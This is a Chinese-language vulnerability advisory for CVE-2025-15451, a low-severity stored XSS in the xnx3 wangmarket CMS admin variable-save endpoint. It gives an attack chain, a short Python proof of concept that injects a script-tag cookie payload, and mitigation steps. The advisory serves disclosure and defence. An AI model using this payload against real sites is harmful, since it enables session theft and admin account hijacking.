CVE-2025-15451 CVSS 2.4 低危

CVE-2025-15451 xnx3 wangmarket存储型XSS漏洞

披露日期: 2026-01-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15451

漏洞类型

存储型跨站脚本(XSS)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

xnx3 wangmarket

漏洞概述

CVE-2025-15451是xnx3 wangmarket（一款开源CMS系统）中发现的安全漏洞，存在于系统变量管理页面。该漏洞允许具有高权限的攻击者在/admin/system/variableSave.do接口的Description参数中注入恶意JavaScript代码。由于该输入会被存储并在后续页面访问时执行，因此属于存储型XSS（Stored XSS）漏洞。攻击者可以利用此漏洞窃取其他管理员的会话cookie、劫持管理员账户或进行钓鱼攻击。漏洞影响版本至4.9，CVSS评分2.4（低危），但考虑到需要高权限和用户交互，实际危害有限。漏洞信息已被公开披露，供应商未对此问题作出回应。

技术细节

该漏洞位于xnx3 wangmarket的管理后台系统变量保存功能中。具体问题出在/admin/system/variableSave.do接口对Description参数的处理。当管理员尝试保存系统变量时，程序未对用户输入的Description进行充分的输入验证和输出编码，直接将数据存储到数据库。随后当其他用户访问相关页面或触发变量展示功能时，存储的恶意脚本会被浏览器解析执行。攻击者需要具备管理员权限才能访问该接口，但一旦成功注入，存储型XSS的影响范围将扩大到所有查看该变量的用户。攻击者可通过构造包含<script>标签或事件处理器（如onerror、onload）的Payload来实现JavaScript代码执行。

攻击链分析

STEP 1

步骤1

攻击者获得xnx3 wangmarket管理员账户权限

STEP 2

步骤2

访问/admin/system/variableSave.do系统变量保存页面

STEP 3

步骤3

在Description参数中构造XSS Payload，如<script>alert(document.cookie)</script>

STEP 4

步骤4

提交恶意数据，payload被存储到数据库

STEP 5

步骤5

其他管理员访问系统变量页面时，恶意脚本被执行

STEP 6

步骤6

攻击者窃取管理员cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15451 PoC - Stored XSS in xnx3 wangmarket
# Target: /admin/system/variableSave.do

target_url = "http://target.com/admin/system/variableSave.do"

# XSS payload for Description parameter
payload = {
    "name": "test_variable",
    "value": "test_value",
    "description": "<script>alert(document.cookie)</script>"
}

# Authentication required (High Privilege)
cookies = {
    "JSESSIONID": "your_admin_session_id"
}

try:
    response = requests.post(target_url, data=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] XSS payload submitted successfully")
        print("[*] Payload will execute when admin views system variables page")
except requests.exceptions.RequestException as e:
    print(f"[-] Request failed: {e}")

影响范围

xnx3 wangmarket <= 4.9

防御指南

临时缓解措施

如果无法立即升级，可临时措施包括：1)限制管理后台访问IP；2)启用WAF规则过滤XSS特征；3)对/admin/system/variableSave.do接口实施额外的输入验证；4)监控管理员账户的异常操作行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15451
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15451
3 Details https://www.cvedetails.com/cve/CVE-2025-15451/
4 VulDB https://vuldb.com/cve/CVE-2025-15451
5 Link https://vuldb.com/?ctiid.339484
6 Link https://vuldb.com/?id.339484
7 Link https://vuldb.com/?submit.724838
8 Link https://www.yuque.com/cocount-eveo/lu0220/eg6s9gropfwtoz9w?singleDoc

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表